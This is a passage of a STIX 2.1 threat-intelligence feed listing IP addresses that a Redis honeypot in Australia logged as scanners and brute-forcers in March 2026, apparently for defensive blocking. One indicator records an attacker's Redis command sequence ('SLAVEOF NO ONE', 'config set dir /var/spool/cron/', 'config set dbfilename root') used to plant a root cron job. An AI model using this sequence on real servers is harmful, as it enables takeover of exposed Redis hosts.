      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T15:25:09.000Z",
      "valid_until": "2026-04-11T15:25:07.000Z"
    },
    {
      "created": "2026-03-10T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=197695; asn_org=Domain names registrar REG.RU, Ltd; redis_cmd_hits=0",
      "id": "indicator--1222a6ab-64a3-4976-a638-8f0349c721e4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '194.58.114.139']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T16:25:13.000Z",
      "valid_until": "2026-04-11T16:25:12.000Z"
    },
    {
      "created": "2026-03-10T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=RU; asn=9123; asn_org=Jsc timeweb; redis_cmd_hits=0",
      "id": "indicator--06b43a84-1aed-4ef4-a12b-247d175d39b6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '46.149.71.117']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T16:25:13.000Z",
      "valid_until": "2026-04-11T16:25:12.000Z"
    },
    {
      "created": "2026-03-10T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58519; asn_org=Cloud Computing Corporation; redis_cmd_hits=0",
      "id": "indicator--d65606a4-f7ad-4723-9704-9ce35dac52d7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.43.64.3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T19:25:13.000Z",
      "valid_until": "2026-04-11T19:25:12.000Z"
    },
    {
      "created": "2026-03-10T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--621b62ce-dd56-45ac-9ab7-6cf1b62ba9dd",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '218.244.136.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T19:25:13.000Z",
      "valid_until": "2026-04-11T19:25:12.000Z"
    },
    {
      "created": "2026-03-10T20:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=34; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmds=SLAVEOF NO ONE,CONFIG SET dir /tmp/,config set rdbcompression yes,config set dir /var/spool/cron/,config set dbfilename root; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--46ac4091-cf2b-4927-8272-6d9d1cd72dee",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-10T20:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '119.146.94.93']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T20:25:06.000Z",
      "valid_until": "2026-04-11T20:25:05.000Z"
    },
    {
      "created": "2026-03-10T20:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--96e30487-9b43-46bb-8b55-5b38c98eb72b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T20:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.43']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T20:25:06.000Z",
      "valid_until": "2026-04-11T20:25:05.000Z"
    },
    {
      "created": "2026-03-10T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--cb348a88-6b4b-475e-a631-179799e22e80",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.184']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T21:25:13.000Z",
      "valid_until": "2026-04-11T21:25:12.000Z"
    },
    {
      "created": "2026-03-10T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--aff31cb7-4482-47a9-9108-26cd413ba384",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.150']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T22:25:03.000Z",
      "valid_until": "2026-04-11T22:25:02.000Z"
    },
    {
      "created": "2026-03-10T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--aa08b597-1a22-470c-add8-a70c9da75b7c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.197']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T22:25:03.000Z",
      "valid_until": "2026-04-11T22:25:02.000Z"
    },
    {
      "created": "2026-03-10T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--9b77b954-e2bd-4176-b82e-3c892a40cec3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.154.176']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T22:25:03.000Z",
      "valid_until": "2026-04-11T22:25:02.000Z"
    },
    {
      "created": "2026-03-10T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--dcf8e454-c632-4d4a-87c1-9c45fb58b5a8",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.155.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T22:25:03.000Z",
      "valid_until": "2026-04-11T22:25:02.000Z"
    },
    {
      "created": "2026-03-10T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--0d752244-fe14-4c26-8467-45898549ed18",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '39.106.148.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T22:25:03.000Z",
      "valid_until": "2026-04-11T22:25:02.000Z"
    },
    {
      "created": "2026-03-10T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--52fe56b4-1f4e-4aec-b4d7-bd090c4ffd24",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '98.89.204.118']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T22:25:03.000Z",
      "valid_until": "2026-04-11T22:25:02.000Z"
    },
    {
      "created": "2026-03-11T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0",
      "id": "indicator--3ecf3be4-ea66-43ce-b69c-027fae9f1253",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.163.125.74']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T00:25:13.000Z",
      "valid_until": "2026-04-12T00:25:12.000Z"
    },
    {
      "created": "2026-03-11T01:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--b559794f-b0c3-4128-8575-2f20facaeca0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T01:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '121.196.225.181']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T01:25:04.000Z",
      "valid_until": "2026-04-12T01:25:02.000Z"
    },
    {
      "created": "2026-03-11T02:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--8092a581-171f-4d50-8eb1-2d915be29712",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T02:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.131.102.67']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T02:25:04.000Z",
      "valid_until": "2026-04-12T02:25:02.000Z"
    },
    {
      "created": "2026-03-11T04:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--a73a6e5a-fa71-4cbf-b9fb-f1f3655f85ca",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T04:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.43']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T04:25:03.000Z",
      "valid_until": "2026-04-12T04:25:02.000Z"
    },
    {
      "created": "2026-03-11T04:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--69a73c4b-4549-497e-9d9a-8ddebcb237b9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T04:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.41']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T04:25:03.000Z",
      "valid_until": "2026-04-12T04:25:02.000Z"
    },
    {
      "created": "2026-03-11T05:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=28; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0",
      "id": "indicator--5d01e53d-7373-47f0-8506-15a26cbb63e5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T05:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '216.180.246.234']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T05:25:07.000Z",
      "valid_until": "2026-04-12T05:25:06.000Z"
    },
    {
      "created": "2026-03-11T05:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0",
      "id": "indicator--2d76394d-c1e9-4470-81da-e4731807c769",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T05:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '216.180.246.72']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T05:25:07.000Z",
      "valid_until": "2026-04-12T05:25:06.000Z"
    },
    {
      "created": "2026-03-11T05:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=397423; asn_org=Tier.Net Technologies LLC; redis_cmd_hits=0",
      "id": "indicator--79c9cd12-b405-4448-aa3a-76a12bca6db7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T05:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.43.14.119']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T05:25:07.000Z",
      "valid_until": "2026-04-12T05:25:06.000Z"
    },
    {
      "created": "2026-03-11T06:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=19318; asn_org=Interserver, Inc; redis_cmd_hits=0",
      "id": "indicator--383dd47d-d211-4331-bb08-ed95c31009ed",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T06:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '104.37.191.21']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T06:25:06.000Z",
      "valid_until": "2026-04-12T06:25:05.000Z"
    },
    {
      "created": "2026-03-11T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--f6354fd4-e0f2-4947-b04f-0897852193bb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '104.248.126.157']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T07:25:13.000Z",
      "valid_until": "2026-04-12T07:25:12.000Z"
    },
    {
      "created": "2026-03-11T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--9410b97b-c2ae-48cd-a4c1-200f16e75495",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '142.93.57.68']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T07:25:13.000Z",
      "valid_until": "2026-04-12T07:25:12.000Z"
    },
    {
      "created": "2026-03-11T08:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--db24f1c1-c184-488d-b0b4-9ac61d3cef70",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T08:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.230.61.69']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T08:25:16.000Z",
      "valid_until": "2026-04-12T08:25:12.000Z"
    },
    {
      "created": "2026-03-11T08:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--5dd65821-28c3-49d7-8a7c-dc216f273d4c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T08:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.199.82.102']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T08:25:16.000Z",
      "valid_until": "2026-04-12T08:25:12.000Z"
    },
    {
      "created": "2026-03-11T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=3; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--6d05db9a-5d64-433c-8261-2dff38a56b42",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '104.248.235.178']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T09:25:09.000Z",
      "valid_until": "2026-04-12T09:25:06.000Z"
    },
    {
      "created": "2026-03-11T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--45f18fea-60e6-4248-9aea-b584b4816319",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '71.6.232.20']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T09:25:09.000Z",
      "valid_until": "2026-04-12T09:25:06.000Z"
    },
    {
      "created": "2026-03-11T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--2a6fd002-417c-4566-9ec3-b70e2f8ea1f5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.148.227.209']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T09:25:09.000Z",
      "valid_until": "2026-04-12T09:25:06.000Z"
    },
    {
      "created": "2026-03-11T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--7aa5a21a-4f63-48b0-84e0-9b056d368c08",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '122.191.115.237']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T11:25:13.000Z",
      "valid_until": "2026-04-12T11:25:12.000Z"
    },
    {
      "created": "2026-03-11T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--0a03e6fb-f243-423e-9825-439dd6a26d1e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '142.93.255.85']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T11:25:13.000Z",
      "valid_until": "2026-04-12T11:25:12.000Z"
    },
    {
      "created": "2026-03-11T12:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--a99da0d4-a0a7-403b-8b53-a90d1418e7e8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T12:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.172.248.108']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T12:25:03.000Z",
      "valid_until": "2026-04-12T12:25:02.000Z"
    },
    {
      "created": "2026-03-11T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=3; ports=6379; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--c3ff5785-d9f8-4880-8b65-cc12d1a74dbb",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.166.106']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T13:25:13.000Z",
      "valid_until": "2026-04-12T13:25:12.000Z"
    },
    {
      "created": "2026-03-11T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--da75c319-53a5-4cb0-a26b-d252e5cdfd8f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.163']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T13:25:13.000Z",
      "valid_until": "2026-04-12T13:25:12.000Z"
    },
    {
      "created": "2026-03-11T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--4fc4c0b5-6540-4094-936f-fa19fc991766",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.234.21.101']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T13:25:13.000Z",
      "valid_until": "2026-04-12T13:25:12.000Z"
    },
    {
      "created": "2026-03-11T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--8ecfb946-c3e6-4ea8-87b7-282303ffd89d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.106.66.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T13:25:13.000Z",
      "valid_until": "2026-04-12T13:25:12.000Z"
    },
    {
      "created": "2026-03-11T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--da3c468d-9414-4041-832c-644046671471",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.153.155']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T13:25:13.000Z",
      "valid_until": "2026-04-12T13:25:12.000Z"
    },
    {
      "created": "2026-03-11T14:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--79241d90-9a2d-4a53-bab8-43016e51a699",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T14:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '150.158.97.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T14:25:14.000Z",
      "valid_until": "2026-04-12T14:25:12.000Z"
    },
    {
      "created": "2026-03-11T14:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--5d9f34a8-c784-489d-9695-7de1b4f02102",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T14:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.24']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T14:25:14.000Z",
      "valid_until": "2026-04-12T14:25:12.000Z"
    },
    {
      "created": "2026-03-11T14:25:14.000Z",
